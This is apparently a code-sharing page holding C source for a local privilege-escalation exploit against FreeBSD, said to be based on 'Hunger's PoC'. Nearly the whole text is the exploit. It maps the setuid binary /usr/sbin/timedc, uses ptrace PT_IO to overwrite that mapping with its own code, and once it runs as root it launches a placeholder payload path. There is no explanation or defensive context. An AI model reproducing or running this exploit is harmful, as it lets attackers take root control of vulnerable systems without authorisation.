Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
#include <unistd.h>
2
#include <fcntl.h>
3
#include <sys/stat.h>
4
#include <sys/mman.h>
5
#include <sys/types.h>
6
#include <sys/ptrace.h>
7
#include <sys/wait.h>
8

9
#define TG "/usr/sbin/timedc"
10

11
/*
12
This is based on Hunger's PoC
13
*/
14
int main(int ac, char **av) {
15
   int from_fd, to_fd, status;
16
   struct stat st;
17
   struct ptrace_io_desc piod;
18
   char *s, *d;
19
   int pid;
20
   char *bin = "MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890";  // is just a place holder
21

22
   if (geteuid() == 0)  {
23
        setuid(0);
24
        execl(bin, bin, NULL);
25
        return 0;
26
   }
27

28
  from_fd = open(av[0], O_RDONLY);
29
  to_fd = open(TG, O_RDONLY);
30
  if ( from_fd == -1 || to_fd == -1 )                return 0;
31
  if (stat(av[0], &st) == -1)                        return 0;
32

33
  s = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, from_fd, (off_t)0);
34
  d = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0);
35

36
   if (s == MAP_FAILED || d == MAP_FAILED)           return 0;
37
   if ((pid = fork()) == -1)                         return 0;
38
   if (!pid) {
39
        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) return 0;
40
  }
41

42
   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)        return 0;
43
   if (wait(&status) == -1)                          return 0;
44

45
   piod.piod_op = PIOD_WRITE_D;
46
   piod.piod_offs = d;
47
   piod.piod_addr = s;
48
   piod.piod_len  = st.st_size;
49

50
   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)  return 0;
51
   execl(TG, TG, NULL);
52

53
  return 0;
54
}
55

56